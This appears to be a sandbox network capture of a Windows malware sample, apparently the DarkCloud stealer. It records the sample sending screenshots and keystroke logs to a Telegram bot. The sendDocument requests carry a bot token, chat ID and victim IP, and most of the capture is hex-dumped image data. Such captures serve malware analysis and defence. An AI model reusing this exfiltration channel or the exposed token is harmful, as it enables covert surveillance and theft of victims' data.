                                                                                      2024-11-25 12:41:09 UTC595INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 35 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 36 35 30 36 38 30 31 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 61 72 6b 63 6c 6f 75 64 5f 52 65 73 75 6c 74 5f 62 6f 78 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 61 72 6b 63 6c 6f 75 64 5f 52 65 73 75 6c 74 5f 62 6f 78 38 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 31 31 35 38 35 30 36 38 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 68 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 42 6f 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 48 52 77 65 62 63 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64
                                                                                      Data Ascii: {"ok":true,"result":{"message_id":2540,"from":{"id":8165068013,"is_bot":true,"first_name":"Darkcloud_Result_box8","username":"Darkcloud_Result_box8_Bot"},"chat":{"id":6115850689,"first_name":"Chi","last_name":"Boy","username":"HRwebc","type":"private"},"d


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      10192.168.2.649983149.154.167.2204434304C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-25 12:41:12 UTC562OUTPOST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 3932422
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-25 12:41:12 UTC16355OUTData Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 67 58 6e 72 4f 78 43 75 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a
                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotgXnrOxCu.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
                                                                                      2024-11-25 12:41:12 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:41:12 UTC16355OUTData Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00
                                                                                      Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                      2024-11-25 12:41:12 UTC16355OUTData Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:41:12 UTC16355OUTData Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                      2024-11-25 12:41:12 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:41:12 UTC16355OUTData Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14
                                                                                      Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                      2024-11-25 12:41:12 UTC16355OUTData Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:41:12 UTC232OUTData Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                      2024-11-25 12:41:12 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:41:17 UTC388INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Mon, 25 Nov 2024 12:41:17 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 600
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      11192.168.2.649998149.154.167.2204434304C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-25 12:41:19 UTC558OUTPOST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 568
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-25 12:41:19 UTC568OUTData Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 65 79 44 61 74 61 66 54 75 53 64 4b 67 6e 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0d 0a 5b 30 37 3a 34 31 3a 30 38 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 37 3a 34 31 3a 30 39 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 37 3a 34 31 3a 30 39 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61
                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="KeyDatafTuSdKgn.txt"Content-Type: application/octet-stream[07:41:08]<<Program Manager>>[07:41:09]<<Program Manager>>[07:41:09]<<Program Mana
                                                                                      2024-11-25 12:41:20 UTC388INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Mon, 25 Nov 2024 12:41:20 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 594
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      2024-11-25 12:41:20 UTC594INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 35 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 36 35 30 36 38 30 31 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 61 72 6b 63 6c 6f 75 64 5f 52 65 73 75 6c 74 5f 62 6f 78 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 61 72 6b 63 6c 6f 75 64 5f 52 65 73 75 6c 74 5f 62 6f 78 38 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 31 31 35 38 35 30 36 38 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 68 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 42 6f 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 48 52 77 65 62 63 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64
                                                                                      Data Ascii: {"ok":true,"result":{"message_id":2542,"from":{"id":8165068013,"is_bot":true,"first_name":"Darkcloud_Result_box8","username":"Darkcloud_Result_box8_Bot"},"chat":{"id":6115850689,"first_name":"Chi","last_name":"Boy","username":"HRwebc","type":"private"},"d


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      12192.168.2.650007149.154.167.2204434304C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-25 12:41:23 UTC562OUTPOST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 3932422
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-25 12:41:23 UTC16355OUTData Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 4c 55 71 43 64 5a 58 70 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a
                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotLUqCdZXp.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
                                                                                      2024-11-25 12:41:23 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:41:23 UTC16355OUTData Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00
                                                                                      Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                      2024-11-25 12:41:23 UTC16355OUTData Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f
                                                                                      Data Ascii:
